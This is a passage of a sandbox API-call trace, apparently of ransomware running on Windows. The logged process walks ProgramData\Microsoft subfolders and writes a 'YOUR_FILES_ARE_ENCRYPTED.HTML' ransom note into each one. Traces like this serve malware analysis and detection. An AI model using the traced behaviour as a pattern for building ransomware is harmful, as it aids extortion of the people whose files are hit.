ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x1c88395, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0108.147] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 1 [0108.147] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 0 [0108.147] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0108.148] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0108.148] GetProcessHeap () returned 0x600000 [0108.148] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.148] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\winmsipc\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.149] WriteFile (in: hFile=0x308, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.150] CloseHandle (hObject=0x308) returned 1 [0108.150] GetProcessHeap () returned 0x600000 [0108.150] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.150] GetProcessHeap () returned 0x600000 [0108.150] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.151] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Server", cAlternateFileName="")) returned 0 [0108.151] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0108.153] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0108.153] GetProcessHeap () returned 0x600000 [0108.153] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x313b008 [0108.159] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WinMSIPC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\winmsipc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.159] WriteFile (in: hFile=0x30c, lpBuffer=0x313b008*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x313b008*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.160] CloseHandle (hObject=0x30c) returned 1 [0108.161] GetProcessHeap () returned 0x600000 [0108.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.161] GetProcessHeap () returned 0x600000 [0108.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0108.162] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0108.162] StrStrIW (lpFirst="WwanSvc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.162] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned 36 [0108.162] GetProcessHeap () returned 0x600000 [0108.162] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0108.163] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc" [0108.163] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*" [0108.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0108.164] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0108.164] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="DMProfiles", cAlternateFileName="DMPROF~1")) returned 1 [0108.164] StrStrIW (lpFirst="DMProfiles", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.164] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles") returned 47 [0108.164] GetProcessHeap () returned 0x600000 [0108.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.166] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles" [0108.166] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\*" [0108.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName=".", cAlternateFileName="")) returned 0x626838 [0108.166] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 1 [0108.166] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 0 [0108.166] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0108.166] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0108.166] GetProcessHeap () returned 0x600000 [0108.166] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.167] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\DMProfiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wwansvc\\dmprofiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0108.167] GetProcessHeap () returned 0x600000 [0108.167] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.167] GetProcessHeap () returned 0x600000 [0108.167] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.168] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Profiles", cAlternateFileName="")) returned 1 [0108.168] StrStrIW (lpFirst="Profiles", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.168] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned 45 [0108.168] GetProcessHeap () returned 0x600000 [0108.168] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.169] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles" [0108.169] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*" [0108.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName=".", cAlternateFileName="")) returned 0x626738 [0108.170] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 1 [0108.170] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 0 [0108.170] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0108.170] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0108.170] GetProcessHeap () returned 0x600000 [0108.170] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.170] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0108.170] GetProcessHeap () returned 0x600000 [0108.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.171] GetProcessHeap () returned 0x600000 [0108.171] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.171] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Profiles", cAlternateFileName="")) returned 0 [0108.171] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0108.172] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0108.172] GetProcessHeap () returned 0x600000 [0108.172] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x313b008 [0108.173] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wwansvc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.174] WriteFile (in: hFile=0x30c, lpBuffer=0x313b008*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x313b008*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.175] CloseHandle (hObject=0x30c) returned 1 [0108.176] GetProcessHeap () returned 0x600000 [0108.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.176] GetProcessHeap () returned 0x600000 [0108.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0108.177] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="XboxLive", cAlternateFileName="")) returned 1 [0108.177] StrStrIW (lpFirst="XboxLive", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.177] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive") returned 37 [0108.177] GetProcessHeap () returned 0x600000 [0108.177] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0108.178] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive") returned="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive" [0108.178] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\*" [0108.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0108.179] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0108.179] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="NSALCache", cAlternateFileName="NSALCA~1")) returned 1 [0108.179] StrStrIW (lpFirst="NSALCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.179] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache") returned 47 [0108.179] GetProcessHeap () returned 0x600000 [0108.179] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.181] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache") returned="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache" [0108.181] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache\\*" [0108.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0108.181] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 1 [0108.181] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x1c88395, cFileName="..", cAlternateFileName="")) returned 0 [0108.181] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0108.181] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0108.181] GetProcessHeap () returned 0x600000 [0108.181] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.182] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\NSALCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\xboxlive\\nsalcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.182] WriteFile (in: hFile=0x308, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.183] CloseHandle (hObject=0x308) returned 1 [0108.184] GetProcessHeap () returned 0x600000 [0108.184] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.184] GetProcessHeap () returned 0x600000 [0108.184] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.185] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="NSALCache", cAlternateFileName="NSALCA~1")) returned 0 [0108.185] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0108.185] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\XboxLive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0108.185] GetProcessHeap () returned 0x600000 [0108.185] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x313b008 [0108.186] CreateFileW 